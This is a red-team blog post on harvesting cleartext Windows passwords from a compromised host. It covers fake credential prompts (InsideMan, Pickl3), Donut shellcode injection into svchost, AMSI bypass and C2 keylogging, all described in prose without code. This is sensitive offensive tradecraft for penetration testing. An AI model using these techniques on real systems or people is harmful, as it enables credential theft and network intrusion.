Open in app

Sign in

Write

Sign in

Home-Grown Red Team: Internal Windows Phishing With Pickl3 And InsideMan

assume-breach
7 min readApr 12, 2022

--

Let’s assume that you’ve sent your phishing email, found an external RCE exploit that led to internal network access, or whatever method you used to get a shell back from a low level workstation.

You do all of your Privilege Escalation techniques -unsecured object, Windows Credential Manager dumping, unsecured services, PATH exploitation- you come up with a big ole goose egg.

Now what?

Why don’t we just ask the user what their password is?

All About Creds

Windows Privilege Escalation is one of the most important topics for pentesting, red teaming and protecting our own computer against various attacks. When you’re attacking a network, having regular domain credentials for a user is essential for running applications like BloodHound and exploits like NoPac or PrinterBug.

So we have our beacon, how can we ask the user for their password? The answer is actually pretty simple. Having finished the Sektor 7 Windows Privilege Escalation course, I learned several cool techniques for escalating privileges for higher integrity shells.

One of the techniques taught in the course was called “A Thief,” which used a PowerShell one-liner to spawn a Windows Security message box.

This is great! It automatically enumerates the username and the domain of the user and enters it into the command prompt. What happens when I enter the password?

Cool! It shows the password in cleartext on the command prompt. We should be all set then, right? Not exactly.

What Are The Problems?

There are two problems with this. The first problem is that the one-liner has been entered on the user’s command prompt from a GUI session. We want to do this remotely. Let’s see if we can enter the same one-liner from a Covenant beacon.

The screenshot is a little hard to see, but here’s the gist of the output. Since the one-liner requires user-input, the command will fail. We’re not allowed to run a script that requires user-input remotely (at least I didn’t find a way!).

There are ways around this. One of the ways to do this is from a post way back in 2015 titled PowerShell Popups + Capture. This method involves setting up Metasploit and capturing the command. It works, but can’t we make it easier? Of course.

The second problem with the one-liner is that it only shows the cleartext credential on the victim user’s console. So in order to get the cleartext password, we would need to be in the context of the user’s session.

Obviously, these are not the best scenarios for our internal Windows phishing attempt. Luckily, we have 2 methods that we can use to gain cleartext creds.

Method 1: InsideMan.exe

Shameless plug of my own tool aside, InsideMan.exe is a non-sophisticated way of easily prompting the user to enter their password. The program will then write the cleartext password to a text file in the user’s Documents directory.

The program is written in C++ and uses a system call to initiate a PowerShell session and run a modified version of the command from the Sektor 7 Windows PrivEsc course. You can find a pre-compiled version of InsideMan on my GitHub or you can compile it yourself via gcc.

We’ll assume that we have a beacon on our target. I’m going to use Covenant C2 for the demonstration. I have used the upload feature to drop InsideMan.exe to disk. As you can see, Windows Defender is on. I have used the built in AMSI Bypass function from Covenant, but only to run PowerShell commands as InsideMan.exe is not seen as malicious (yet).

So here’s the first problem with this method. You must drop an EXE to disk. Yeah, I know. OPSEC! I don’t like having artifacts on a system either, but it is what it is. Besides, we drop files to disk with our phishing payloads anyway!

Now we can run InsideMan from the beacon.

The user is prompted with a Windows credential message box.

Wendy enters her password at the prompt.

The windows32.txt file is created in Wendy’s Documents directory.

And we can type out the file to get her cleartext password!

This is a super simple way to easily prompt the user to enter their password. There is no process injection, no fancy Windows API calls or unhooking. Just point and shoot. You can run the EXE as many times as needed until you get the password.

So now let’s see a different method of prompting the user for a password. This one is going to be much more involved.

Method 2: Process Injection With Donut And Pickl3

This method uses a tool called Pickl3. Pickl3 is a C++ program written with Windows API calls that elicit a Windows Credential window similar to InsideMan. Also similar to a former problem we had, Pickl3 only displays the cleartext password in the user’s session. So how do we get around this?

One way that we can accomplish our phishing goal is to utilize process injection. We can convert Pickl3 into shellcode with Donut and then inject it into a process via our beacon. We can then use the keylogger function from Covenant/Cobalt Strike to catch the password as its typed into the prompt.

Compiling

You can compile Pickl3’s C++ file with Visual Studio. Open a new C++ console application and paste the code from the cpp file into VS. Compile via the Build tab to get your EXE file.

Converting Pickl3 Into Shellcode

If you don’t have Donut, you can clone it to your Windows machine from GitHub. We’ll use the -b flag for extra AMSI bypass capabilities.

Process Injection Part 1:

Back on our beacon, we can run “ps” to get the active processes on the system.

As we look at our processes, we see that svchost is running. This is a good process to inject to.

The pid number is 1680 so we’ll remember this and start our keylogger.

Keylogging

Covenant, Metasploit and Cobalt Strike all offer keylogging functionality. for Covenant, we just type Keylogger into the prompt and we are given a few time options.

We can choose the 30 second interval.

Process Injection Part 2:

We need to bypass AMSI one more time before we inject the process.

We type our pid number into the ProcessID field and then click “Browse” to choose our shellcode.

We click “Execute” and on our victim machine, we see the password prompt.

We enter the password into the prompt and back on our beacon, we get the cleartext password.

When we remove the shift key and the Enter key output we get winter20!

Takeaways

These are both pretty good methods of getting some cleartext passwords out of a remote beacon. While dropping an EXE to disk is not the most OPSEC safe technique, it works quickly without requiring any AV bypasses or EDR evasion. We can also delete the artifacts quickly after the password has been obtained.

Running the processes in memory through process injection is a better way to complete our goal, but it doesn’t come without its own issues. We’ll have to run our keylogger and I’ve found some compatibility issues with machines that do not have Visual Studio C++ installed.

A system that doesn’t have these files installed with return with an exception error.

I have also found that in order to get Pickl3 to work you must bypass AMSI right before you attempt the injection. Since InsideMan only uses PowerShell calls, we don’t need to do any of these processes.

NOTE: I have reached out to the author of Pickl3 to see how he has compiled the tool to see if I can get more compatibility with it. I will update this article once I hear from him.

For more Red Team techniques and cool stuff, follow me here on Medium or on Twitter @assume_breach

Hacking
Red Team
Programming
Technology
Windows

--

--

assume-breach
assume-breach

Written by assume-breach

4.95K Followers
6 Following

Security enthusiast that loves a good CTF! OSCP, CRTO, RHCSA, MCSA.

No responses yet

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams